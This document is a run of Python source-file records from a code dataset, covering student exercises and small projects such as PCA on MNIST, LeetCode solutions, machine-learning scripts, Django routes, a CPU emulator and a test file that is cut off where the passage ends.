nXaxes: `int`, optional\n Number of figure axes in the x direction\n nYaxes: `int`, optional\n Number of figure axes in the y direction\n \"\"\"\n fig, axes = plt.subplots(nXaxes, nYaxes)\n\n for ax, k, eigVec in zip(axes.ravel(), range(n), eigenvectors.T):\n ax.imshow(eigVec.reshape((28, 28)))\n ax.set_title(f\"k={k}\")\n ax.axis(\"off\")\n\n plt.show()\n\n\ndef plot_pca(x, y, eigenvectors, mu, digits =(2, 6, 7), ks=(5, 15, 40, 100)):\n \"\"\"Plots the original digits and their reconstruction for different number\n of used eigenvectors.\n\n Parameters\n ----------\n x: `np.array`\n Features\n y: `np.array`\n Labels\n eigenvectors: `np.array`\n Eigenvectors\n mu: `np.array`\n Fitted mu.\n eigenvectors: `np.array`\n Eigenvectors\n digits: `tuple`\n Digits to plot\n ks: `tuple`\n Tuple of integers declaring how many eigenvectors should be used in\n reconstruction.\n \"\"\"\n fig, axes = plt.subplots(len(digits), len(ks)+1)\n if len(digits) == 1:\n axes = np.array([axes])\n\n idxDigits = [np.where(y==digit)[0][0] for digit in digits]\n\n for yax, digit, idxDigit in zip(axes[:, 0], digits, idxDigits):\n yax.imshow(x[idxDigit].reshape((28, 28)))\n yax.set_title(f\"Original image (digit {digit})\")\n yax.axis(\"off\")\n\n for yax, digit, idxDigit in zip(axes[:, 1:], digits, idxDigits):\n for xax, k in zip(yax, ks):\n Vk = eigenvectors[:, :k]\n reconstruction = np.dot(Vk, np.dot(Vk.T, (x-mu.T)[idxDigit])).reshape((784, 1))\n reconstruction += mu\n xax.imshow(reconstruction.reshape((28, 28)))\n xax.set_title(f\"Reconstructed (k= {k})\")\n xax.axis(\"off\")\n\n plt.show()\n\n\ndef pca():\n \"\"\"Preforms PCA on MNIST dataset.\n\n Calculates prints some eigenvalues, prints the sum of all eigenvalues.\n Plots first 25 eigenvectors.\n Plots eigenvalue fraction.\n Calculates the test and train errors for reconstructions up to first 100\n eigenvectors. Plots them.\n Reconstructs certain digits for varying number of used eigenvectors. Plots\n them.\n \"\"\"\n train, trainLabels, test, testLabels = load_mnist_dataset()\n\n n, d = train.shape\n I = np.ones((n, 1))\n\n mu = np.dot(train.T, I)/n\n sigElem = train - np.dot(I, mu.T)\n sigma = np.dot(sigElem.T, sigElem)/n\n\n eigenvalues, eigenvectors = np.linalg.eigh(sigma)\n eigenvalues = eigenvalues[np.argsort(-1 * eigenvalues)]\n eigenvectors = eigenvectors[:, np.argsort(eigenvalues)]\n\n totEigenSum = np.sum(eigenvalues)\n\n trainErrors, testErrors, eigenRatios = [], [], []\n eigenSum, k = 0, np.arange(100)\n for i in k:\n Vk = eigenvectors[:, :(i+1)]\n transMatrix = np.dot(Vk, Vk.T)\n trainErrors.append(calculate_errors(train, transMatrix=transMatrix))\n testErrors.append(calculate_errors(test, transMatrix=transMatrix))\n eigenSum += eigenvalues[i]\n eigenRatios.append(1 - (eigenSum/totEigenSum))\n\n for i in (1, 2, 10, 30, 50):\n print(f\"{i}th eigenvalue: {eigenvalues[i-1]}\")\n print(f\"Sum of eigenvalues: {totEigenSum}\")\n\n plot_n_eigenvectors(16, eigenvectors, nXaxes=4, nYaxes=4)\n plot_eigen_fraction(k, eigenRatios)\n plot_errors(k, trainErrors, testErrors)\n plot_pca(train, trainLabels, eigenvectors, mu)\n\n\nif __name__ == \"__main__\":\n pca()\n","sub_path":"HW3/HW3_code_solutions/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"186533068","text":"with open('test.txt', 'r') as f:\n data = f.read().splitlines()\nnew_list_letters = []\nlist_letters = [letter for letter in data[0]]\ndef remove_letters():\n last_letter = 'a'\n last_letter_modified = False\n count = 0\n letter_count = len(list_letters) - 1\n for letter in list_letters:\n if letter.lower() == last_letter.lower():\n if ((letter.istitle() and (last_letter.istitle() == False)) or ((letter.istitle() == False) and last_letter.istitle())):\n list_letters.pop(count)\n list_letters.pop(count - 1)\n if len(list_letters) < count:\n import pdb; pdb.set_trace()\n last_letter = list_letters[count + 1]\n letter_count -= 2\n last_letter_modified = True\n\n if count == 7 and letter_count == 13:\n import pdb; pdb.set_trace()\n if last_letter_modified == False:\n last_letter = list_letters[count - 1]\n print(count)\n print(letter_count)\n print(list_letters)\n print()\n if count == letter_count:\n print(list_letters)\n remove_letters()\n\n count += 1\n\n\ndef still_continue():\n leng = len(list_letters)\n count_ = 0\n for letter in list_letters:\n if letter.lower() == last_letter.lower():\n if ((letter.istitle() and (last_letter.istitle() == False)) or ((letter.istitle() == False) and last_letter.istitle())):\n remove_letters()\n if count_ == leng:\n print(list_letters)\n still_continue()\n count_ += 1\nremove_letters()\n","sub_path":"day5/day5.py","file_name":"day5.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"626148268","text":"\"\"\"\nLeetcode #202 Happy Number\n\nWrite an algorithm to determine if a number is \"happy\".\n\nA happy number is a number defined by the following process: \nStarting with any positive integer, replace the number by the \nsum of the squares of its digits, and repeat the process until \nthe number equals 1 (where it will stay), or it loops endlessly \nin a cycle which does not include 1. Those numbers for which \nthis process ends in 1 are happy numbers.\n\nExample: \n\nInput: 19\nOutput: true\nExplanation: \n12 + 92 = 82\n82 + 22 = 68\n62 + 82 = 100\n12 + 02 + 02 = 1\n\nAlgorithm/DS used: Cycle detection - hash set.\n\nO(m*n) worst case time where n is the max number of digits of 'n' and 'm' is the number of computations until a cycle is detected.\n\nO(m) worst case space where 'm' is the number of computations until a cycle is detected.\n\n\"\"\"\n\n\nclass Solution:\n def isHappy(self, n: int) -> bool:\n if n < 0:\n return False\n if n == 1:\n return True\n seen = set()\n while n != 1:\n n = sum([int(c)**2 for c in str(n)])\n if n in seen:\n return False\n else:\n seen.add(n)\n return True\n\n\ndef test_solution():\n s = Solution()\n print(\"Expected result from input 19 is True and the Actual result is: \" +\n str(s.isHappy(19)))\n assert s.isHappy(19) == True\n\n\nif __name__ == \"__main__\":\n test_solution()\n","sub_path":"python3/happy_number.py","file_name":"happy_number.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522505898","text":"def FlyToCentauri(X,Y):\n Fly_Dis = Y - X\n cnt = 0 # 이동 횟수\n Jump = 1 # cnt별 이동 가능한 거리\n Jump_sum = 0 # 이동한 거리의 합\n\n while Jump_sum < Fly_Dis :\n cnt += 1\n Jump_sum += Jump # cnt 수에 해당하는 move를 더함\n if cnt % 2 == 0 : # cnt가 2의 배수일 때, \n Jump += 1 \n return cnt\n\n\nN = int(input())\nfor _ in range(N):\n X, Y = map(int,input().split())\n print(FlyToCentauri(X,Y))\n\n","sub_path":"baekjun/기본 수학1/Fly me to the Alpah Centauri/Fly me to the Alpah Centauri 참고풀이.py","file_name":"Fly me to the Alpah Centauri 참고풀이.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"337695913","text":"import module_kit\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import StratifiedShuffleSplit\r\nfrom sklearn.pipeline import FeatureUnion, Pipeline\r\nfrom sklearn.preprocessing import Imputer, LabelBinarizer, StandardScaler\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.base import BaseEstimator, TransformerMixin\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\n# fetch the estate data from github\r\n# module_kit.fetch_housing_data()\r\n# read csv\r\nhousing = module_kit.load_housing_data()\r\n# plot to see the big picture\r\n# housing.hist(bins=50, figsize=(20, 15))\r\n# plt.show()\r\n# stratify the sample\r\nhousing['income_cat'] = np.ceil(housing['median_income'] / 1.5)\r\nhousing['income_cat'].where(housing['income_cat'] < 5, 5.0, inplace=True) # ceil the max value at 5\r\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)\r\n# stratify sampling the train and test set\r\nfor train_index, test_index in split.split(housing, housing['income_cat']):\r\n strat_train_set = housing.loc[train_index]\r\n strat_test_set = housing.loc[test_index]\r\n# delete column income_car\r\nfor sset in (strat_train_set, strat_test_set):\r\n sset.drop([\"income_cat\"], axis=1, inplace=True) # focus on the inplace, no copy\r\n# backup\r\nhousing = strat_train_set.copy()\r\n# housing.plot(kind='scatter', x='longitude', y='latitude', alpha=0.4,\r\n# s=housing['population']/100, label='population',\r\n# c='median_house_value', cmap=plt.get_cmap('jet'), colorbar=True\r\n# ) # alpha control the color density of scatter dot\r\n# produce some combination features\r\n# housing[\"rooms_per_household\"] = housing[\"total_rooms\"]/housing[\"households\"]\r\n# housing[\"bedrooms_per_room\"] = housing[\"total_bedrooms\"]/housing[\"total_rooms\"]\r\n# housing[\"population_per_household\"] = housing[\"population\"]/housing[\"households\"]\r\n# principle component analysis, calculate the correlation coefficient\r\n# corr_matrix = housing.corr() # return Pearson's r\r\n# print(corr_matrix[\"median_house_value\"].sort_values(ascending=False)) # descending order\r\n# separate the labels from training data_set\r\nhousing = strat_train_set.drop(\"median_house_value\", axis=1)\r\nhousing_labels = strat_train_set[\"median_house_value\"].copy() # training labels\r\nhousing_num = housing.drop(\"ocean_proximity\", axis=1) # return all numerical column\r\nhousing_cat = housing[\"ocean_proximity\"]\r\n\r\n\r\n# data cleaning\r\n# transfer pandas.dataframe to np.array\r\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\r\n def __init__(self, attribute_names):\r\n self.attribute_names = attribute_names\r\n\r\n def fit(self, X, y=None):\r\n return self\r\n\r\n def transform(self, X):\r\n return X[self.attribute_names].values\r\n\r\n\r\n# fix NA\r\nrooms_ix, bedrooms_ix, population_ix, household_ix = 3, 4, 5, 6\r\n\r\n\r\nclass CombinedAttributesAdder(BaseEstimator, TransformerMixin):\r\n def __init__(self, add_bedrooms_per_room=True): # no *args or **kargs\r\n self.add_bedrooms_per_room = add_bedrooms_per_room\r\n\r\n def fit(self, X, y=None):\r\n return self # nothing else to do\r\n\r\n def transform(self, X, y=None):\r\n rooms_per_household = X[:, rooms_ix] / X[:, household_ix]\r\n population_per_household = X[:, population_ix] / X[:, household_ix]\r\n if self.add_bedrooms_per_room:\r\n bedrooms_per_room = X[:, bedrooms_ix] / X[:, rooms_ix]\r\n return np.c_[X, rooms_per_household, population_per_household,\r\n bedrooms_per_room]\r\n else:\r\n return np.c_[X, rooms_per_household, population_per_household]\r\n\r\n\r\nnum_attribs = list(housing_num)\r\ncat_attribs = [\"ocean_proximity\"]\r\n# numerical features: fix NA, feature scaling\r\nnum_pipeline = Pipeline([\r\n ('selector', DataFrameSelector(num_attribs)),\r\n ('imputer', Imputer(strategy=\"median\")),\r\n ('attribs_adder', CombinedAttributesAdder()),\r\n ('std_scaler', StandardScaler()),\r\n])\r\n# category feature: one-hot encoder\r\ncat_pipeline = Pipeline([\r\n ('selector', DataFrameSelector(cat_attribs)),\r\n # ('label_binarizer', LabelBinarizer()),\r\n])\r\n# emerge together\r\nfull_pipeline = FeatureUnion(transformer_list=[\r\n (\"num_pipeline\", num_pipeline),\r\n (\"cat_pipeline\", cat_pipeline),\r\n])\r\nhousing_prepared = full_pipeline.fit_transform(housing)\r\n# one-hot encoder\r\nhousing_prepared = np.delete(housing_prepared, -1, 1)\r\nhousing_cat_1hot = LabelBinarizer().fit_transform(housing_cat)\r\nhousing_prepared = np.c_[housing_prepared, housing_cat_1hot]\r\n# train model\r\nlin_reg = LinearRegression()\r\nlin_reg.fit(housing_prepared, housing_labels)\r\n#test\r\nlittle_data = housing_prepared[:5]\r\nlittle_labels = housing_labels.iloc[:5]\r\nprint(\"Prediction:\\t\", lin_reg.predict(little_data))\r\nprint(\"labels:\\t\", list(little_labels))\r\nhousing_prediction = lin_reg.predict(housing_prepared)\r\nlin_mse = mean_squared_error(housing_labels, housing_prediction)\r\nprint(lin_mse)\r\n# plt.show()\r\n\r\n\r\n\r\n","sub_path":"linear_regression_estate/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"307937546","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom .views import *\n\nurlpatterns = [\n path('listar', listarClientes, name='listarClientes'),\n path('cadastrar', inserir_cliente, name=\"cadastrarCliente\"),\n path('listar/', listar_cliente_id, name=\"listarClienteId\"),\n path('editar/', editar_cliente_id, name=\"editarClienteId\"),\n path('remover/', remover_cliente, name=\"excluirClienteId\")\n ]","sub_path":"clientes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"410319236","text":"'''\nclass Book(object):\n\n def __init__(self, name, page=100):\n self.name = name\n self.page = page\n\n def reading(self, amount):\n self.page = self.page - amount\n return self.page\n\n\nb = Book(name='Python', page=100)\nprint(b.reading(15))\n'''\n\n\nclass Book(object):\n def __init__(self, book_name, pages):\n self.book_name = book_name\n self.pages = pages\n\n def reading(self, kilkist):\n # a = self.pages - kilkist\n # return a\n return self.pages - kilkist\n\n\nb = Book('Python', 100)\nprint(b.reading(6))\nprint(b.pages)\n\n\nclass Notebook(object):\n def __init__(self, model, ram=4):\n self.model = model\n self.ram = ram\n\n def set_ram(self, kilkist):\n self.ram += kilkist\n return self.ram\n\n\nprint('Notebook Asus')\nn = Notebook('Asus')\nprint(n.ram)\nprint(n.set_ram(2))\n","sub_path":"OOP/classBook.py","file_name":"classBook.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"378134806","text":"n = int() \nx = 1\nwhile x < (n - 2):\n x += 2\ndef eh_primo(n):\n if n % 2 == 0 and n != 2 and n != 3 or n % x == 0 and n != 2 and n != 3 or n == 0 or n == 1:\n print (False)\n else:\n print (True)\neh_primo(n)\n","sub_path":"backup/user_055/ch31_2020_03_14_00_52_00_602211.py","file_name":"ch31_2020_03_14_00_52_00_602211.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"182694693","text":"\nfrom warnings import simplefilter; simplefilter(action='ignore', category=FutureWarning)\nfrom sklearn.model_selection import train_test_split as tts\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.ensemble import AdaBoostClassifier as ADABC\nimport pandas as pd\n\n# ---Dataframe Initialization---\nlabels = ( 'age', 'workclass', 'fnlwgt', 'education', 'education-num', 'marital-status', 'occupation', 'relationship', 'race', 'sex',\n 'capital-gain', 'capital-loss', 'hours-per-week', 'native-country', 'income-status' )\ndf = pd.read_csv('adult.csv', names=labels, skipinitialspace=True)\n\n# ---Preprocessing---\n# Replace missing entries with most frequent value in column.\nfor column in 'workclass', 'occupation', 'native-country':\n df[column].replace(['?'], df[column].mode(), inplace=True)\n\n# Normalize continuous values.\nfor column in 'age', 'education-num', 'capital-gain', 'capital-loss', 'hours-per-week':\n df[column] /= df[column].max()\n\n# Remove irrelevant metric(s).\nfor column in 'fnlwgt',:\n df.drop(column, inplace=True, axis='columns')\n\n# Convert qualitative values to quantitative values.\ndf = pd.get_dummies(df)\n\n# ---Training & Testing Data---\nfeature_data = df.drop(['income-status_>50K', 'income-status_<=50K'], axis='columns').values\ntarget_data = df['income-status_>50K'].values\n(train_features, test_features, train_targets, test_targets) = tts(feature_data, target_data, train_size=0.67, stratify=target_data)\n\n# ---Fit Data to Training Model---\nmodel = ADABC()\nmodel.fit(train_features, train_targets)\npredicted = model.predict(test_features)\n\n# ---Results!---\nconf_mat = confusion_matrix(test_targets, predicted)\naccuracy = accuracy_score(test_targets, predicted) * 100\nerror_rate = 100.0 - accuracy\nprint('{:>20}{:>24}\\n{:>20}{:>24}'.format('Accuracy', 'Error Rate', accuracy, error_rate))","sub_path":"Census-Classification/census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"432501992","text":"\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\n\nimg_width, img_height = 128, 128\n\n\n\ntrain_data_dir ='/home/ubuntu/data/Train'\n\nvalidation_data_dir = '/home/ubuntu/data/Validation'\n\ntest_data_dir = '/home/ubuntu/data/Test'\n\nnb_train_samples = 7277\n\nnb_validation_samples = 1301\n\nepochs = 40\n\nbatch_size = 32\n\n\n\n\n\ninput_shape = (img_width, img_height, 1)\n\n\n\n\nmodel = Sequential()\n\nmodel.add(Conv2D(32, (3, 3), input_shape=input_shape, dim_ordering='tf'))\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Conv2D(32, (3, 3)))\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Conv2D(64, (3, 3)))\n\nmodel.add(Activation('relu'))\n\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n\n\n\nmodel.add(Flatten())\n\nmodel.add(Dense(64))\n\nmodel.add(Activation('relu'))\n\nmodel.add(Dropout(0.5))\n\nmodel.add(Dense(3))\n\nmodel.add(Activation('softmax'))\n\n\n\nmodel.compile(loss='categorical_crossentropy',\n\n optimizer='rmsprop',\n\n metrics=['accuracy'])\n\n\n\n# this is the augmentation configuration we will use for training\n\ntrain_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\n\n# this is the augmentation configuration we will use for testing:\n\n# only rescaling\n\nval_datagen = ImageDataGenerator(rescale=1. / 255)\n\ntest_datagen = ImageDataGenerator(rescale=1. / 255)\n\n\n\ntrain_generator = train_datagen.flow_from_directory(\n train_data_dir,\n\n target_size=(img_width, img_height),\n\n batch_size=batch_size,\n \n color_mode='grayscale',\n\n class_mode='categorical')\n\n\n\nvalidation_generator = val_datagen.flow_from_directory(\n\n validation_data_dir,\n\n target_size=(img_width, img_height),\n\n batch_size=batch_size,\n \n color_mode='grayscale',\n\n class_mode='categorical')\n\n\ntest_generator = test_datagen.flow_from_directory(\n\n test_data_dir,\n\n target_size=(img_width, img_height),\n\n batch_size=batch_size,\n \n color_mode='grayscale',\n\n class_mode='categorical')\n\n\nmodel.fit_generator(\n\n train_generator,\n\n steps_per_epoch=nb_train_samples // batch_size,\n\n epochs=epochs,\n\n validation_data=validation_generator,\n\n validation_steps=nb_validation_samples // batch_size)\n\n\nscore = model.evaluate_generator(test_generator, 936)\n\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\nmodel.save_weights('/home/ubuntu/first_try.h5')","sub_path":"CNN_Keras_DL.py","file_name":"CNN_Keras_DL.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"154962964","text":"from node import MongoNode\n\n\nclass MongoReplicaSetMember(MongoNode):\n\n REPLICA_SET_TEMPLATE = '{group}-rs{set_}'\n\n def __init__(self, group=None, server_type=None, instance_type=None,\n environment=None, ami=None, region=None, role=None,\n keypair=None, availability_zone=None,\n security_groups=None, block_devices=None,\n chef_path=None, subnet_id=None, dns_zones=None,\n ingress_groups_to_add=None, ports_to_authorize=None,\n classic_link=False, add_route53_dns=True, chef_server_url=None,\n replica_set=None, mongodb_version=None):\n\n super(MongoReplicaSetMember, self).__init__(group, server_type,\n instance_type,\n environment, ami, region,\n role, keypair,\n availability_zone,\n security_groups,\n block_devices, chef_path,\n subnet_id, dns_zones,\n ingress_groups_to_add,\n ports_to_authorize,\n classic_link,\n add_route53_dns,\n chef_server_url,\n mongodb_version)\n\n self.replica_set = replica_set\n\n def set_chef_attributes(self):\n super(MongoReplicaSetMember, self).set_chef_attributes()\n replica_set = self.REPLICA_SET_TEMPLATE.format(\n group=self.group, set_=self.replica_set)\n self.CHEF_ATTRIBUTES['mongodb']['replicaset_name'] = replica_set\n self.log.info('Set the replica set name to \"{name}\"'.format(\n name=replica_set)\n )\n\n def configure(self):\n super(MongoReplicaSetMember, self).configure()\n self.set_chef_attributes()\n\n if self.replica_set is None:\n self.log.warn('No replica set provided')\n self.replica_set = 1\n\n self.log.info('Using replica set {set}'.format(set=self.replica_set))\n\n @property\n def tags(self):\n\n tags = super(MongoReplicaSetMember, self).tags\n\n tags['ReplicaSet'] = self.REPLICA_SET_TEMPLATE.format(\n group=self.group, set_=self.replica_set\n )\n\n return tags\n","sub_path":"tyr/servers/mongo/member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"307436466","text":"import tkinter as tk\n\nwindows = tk.Tk()\nwindows.title(\"my window\")\nwindows.geometry(\"600x400\")\n# ���口內容開始\n# l = tk.Label(windows,text='Hello world',bg='green',font=('Arial',12),width=15,height=2)\n# l.pack()\n\ndef insert_point():\n var = Entry.get()\n Text.insert('insert',var)\n\ndef insert_end():\n var = Entry.get()\n Text.insert('end',var)\n\n\nEntry = tk.Entry(windows,show=None)\n\nButton1 = tk.Button(windows,text='insert point',width=15,height=2,command = insert_point)\nButton2 = tk.Button(windows,text='insert end',command = insert_end)\nText = tk.Text(windows,height=2)\n\n\nEntry.pack()\nButton1.pack()\nButton2.pack()\nText.pack()\n# 窗口內容結束\nwindows.mainloop()","sub_path":"tkinter/Entry_Text.py","file_name":"Entry_Text.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"124562455","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\nHLT = 0b00000001\nLDI = 0b10000010\nPRN = 0b01000111\nMUL = 0b10100010\nPUSH = 0b01000101\nPOP = 0b01000110\nCALL = 0b01010000\nRET = 0b00010001\nADD = 0b10100000\nCMP = 0b10100111\nJMP = 0b01010100\nJEQ = 0b01010101\nJNE = 0b01010110\nAND = 0b10101000\nOR = 0b10101010\nXOR = 0b10101011\nNOT = 0b01101001\nSHL = 0b10101100\nSHR = 0b10101101\nMOD = 0b10100100\n\nsp = 7\n\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n self.ram = [0] * 256\n self.reg = [0] * 8\n self.pc = 0\n self.halted = False\n self.flag = 0b00000000\n\n self.branchtable = {}\n\n self.branchtable[HLT] = self.handle_hlt\n self.branchtable[LDI] = self.handle_ldi\n self.branchtable[PRN] = self.handle_prn\n self.branchtable[MUL] = self.handle_mul\n self.branchtable[PUSH] = self.handle_push\n self.branchtable[POP] = self.handle_pop\n self.branchtable[CALL] = self.handle_call\n self.branchtable[RET] = self.handle_ret\n self.branchtable[ADD] = self.handle_add\n self.branchtable[CMP] = self.handle_cmp\n self.branchtable[JMP] = self.handle_jmp\n self.branchtable[JEQ] = self.handle_jeq\n self.branchtable[JNE] = self.handle_jne\n self.branchtable[AND] = self.handle_and\n self.branchtable[OR] = self.handle_or\n self.branchtable[XOR] = self.handle_xor\n self.branchtable[NOT] = self.handle_not\n self.branchtable[SHL] = self.handle_shl\n self.branchtable[SHR] = self.handle_shr\n self.branchtable[MOD] = self.handle_mod\n \n self.reg[7] = self.ram[0xF4]\n\n def handle_hlt(self):\n self.halted = True\n \n def handle_ldi(self):\n reg_num = self.ram_read(self.pc + 1)\n value = self.ram_read(self.pc + 2)\n self.reg[reg_num] = value\n self.pc += 3\n \n def handle_prn(self):\n reg_num = self.ram_read(self.pc + 1)\n print(self.reg[reg_num])\n self.pc += 2\n \n def handle_mul(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(MUL, num_1, num_2)\n self.pc +=3\n \n def handle_push(self):\n # setup\n reg_num = self.ram_read(self.pc + 1)\n value = self.reg[reg_num]\n\n # push\n self.reg[sp] -= 1\n self.ram[self.reg[sp]] = value\n self.pc += 2\n \n def handle_pop(self):\n # setup\n reg_num = self.ram_read(self.pc + 1)\n value = self.ram[self.reg[sp]]\n\n # pop\n self.reg[reg_num] = value\n self.reg[sp] += 1\n self.pc += 2\n\n def handle_call(self):\n reg_num = self.ram_read(self.pc + 1)\n self.reg[sp] -= 1\n self.ram[self.reg[sp]] = self.pc + 2\n self.pc = self.reg[reg_num]\n \n def handle_ret(self):\n self.pc = self.ram[self.reg[sp]]\n self.reg[sp] += 1\n\n def handle_add(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(ADD, num_1, num_2)\n self.pc += 3\n\n def handle_cmp(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(CMP, num_1, num_2)\n self.pc += 3\n\n def handle_jmp(self):\n reg_num = self.ram_read(self.pc + 1)\n self.pc = self.reg[reg_num]\n\n def handle_jeq(self):\n reg_num = self.ram_read(self.pc + 1)\n if self.flag == 1:\n self.pc = self.reg[reg_num]\n else:\n self.pc += 2\n\n def handle_jne(self):\n reg_num = self.ram_read(self.pc + 1)\n if self.flag != 1:\n self.pc = self.reg[reg_num]\n else:\n self.pc += 2\n \n def handle_and(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(AND, num_1, num_2)\n self.pc += 3\n \n def handle_or(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(OR, num_1, num_2)\n self.pc += 3\n\n def handle_xor(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(XOR, num_1, num_2)\n self.pc += 3\n \n def handle_not(self):\n num_1 = self.ram_read(self.pc + 1)\n self.alu(NOT, num_1, None)\n self.pc += 2\n \n def handle_shl(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(SHL, num_1, num_2)\n self.pc += 3\n \n def handle_shr(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(SHR, num_1, num_2)\n self.pc += 3\n\n def handle_mod(self):\n num_1 = self.ram_read(self.pc + 1)\n num_2 = self.ram_read(self.pc + 2)\n self.alu(MOD, num_1, num_2)\n self.pc += 3\n\n\n def ram_read(self, address):\n return self.ram[address]\n\n def ram_write(self, address, value):\n self.ram[address] = value\n \n\n def load(self, prog_name):\n \"\"\"Load a program into memory.\"\"\"\n try:\n address = 0\n prog_name = sys.argv[1]\n with open(prog_name) as f:\n for line in f:\n comment_split = line.split(\"#\")[0]\n num = comment_split.strip()\n \n if num == \"\":\n continue\n\n val = int(num, 2)\n self.ram[address] = val\n address += 1\n \n except FileNotFoundError:\n print(\"file not found\")\n sys.exit(2)\n\n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n\n if op == ADD:\n self.reg[reg_a] += self.reg[reg_b]\n #elif op == \"SUB\": etc\n elif op == MUL:\n self.reg[reg_a] *= self.reg[reg_b]\n elif op == CMP:\n if self.reg[reg_a] == self.reg[reg_b]:\n self.flag = 0b00000001\n elif self.reg[reg_a] < self.reg[reg_b]:\n self.flag = 0b00000100\n elif self.reg[reg_a] > self.reg[reg_b]:\n self.flag = 0b00000010\n elif op == AND:\n self.reg[reg_a] = self.reg[reg_a] & self.reg[reg_b]\n \n elif op == OR:\n self.reg[reg_a] = self.reg[reg_a] | self.reg[reg_b]\n \n elif op == XOR:\n self.reg[reg_a] = self.reg[reg_a] ^ self.reg[reg_b]\n \n elif op == NOT:\n self.reg[reg_a] = ~self.reg[reg_a]\n \n elif op == SHL:\n self.reg[reg_a] = self.reg[reg_a] << self.reg[reg_b]\n\n elif op == SHR:\n self.reg[reg_a] = self.reg[reg_a] >> self.reg[reg_b]\n \n elif op == MOD:\n if self.reg[reg_b] == 0:\n print(\"Can't divide by a number which is 0\")\n self.handle_hlt()\n else:\n self.reg[reg_a] = self.reg[reg_a] % self.reg[reg_b]\n else:\n raise Exception(\"Unsupported ALU operation\")\n\n \n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n # self.fl,\n #self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n\n print()\n\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n \n\n while not self.halted:\n ir = self.ram[self.pc]\n\n if ir is None:\n print(\"I did not understand this command\")\n sys.exit(1)\n\n self.branchtable[ir]()\n ","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":7886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"106597556","text":"# pylint: skip-file\nfrom typing import Any, AnyStr\nfrom unittest import TestCase\nfrom unittest.mock import patch, MagicMock\nimport lxml\n\nimport medmij\nfrom . import testdata\n\n\ndef string_urlopen(response_string: AnyStr) -> Any:\n response = MagicMock()\n response.__enter__.return_value = response\n response.getcode.return_value = 200\n response.read.return_value = response_string\n return response\n\n\nclass TestWhitelist(TestCase):\n def test_parse_ok(self) -> None:\n for xml in (testdata.WHITELIST_EXAMPLE_XML,\n 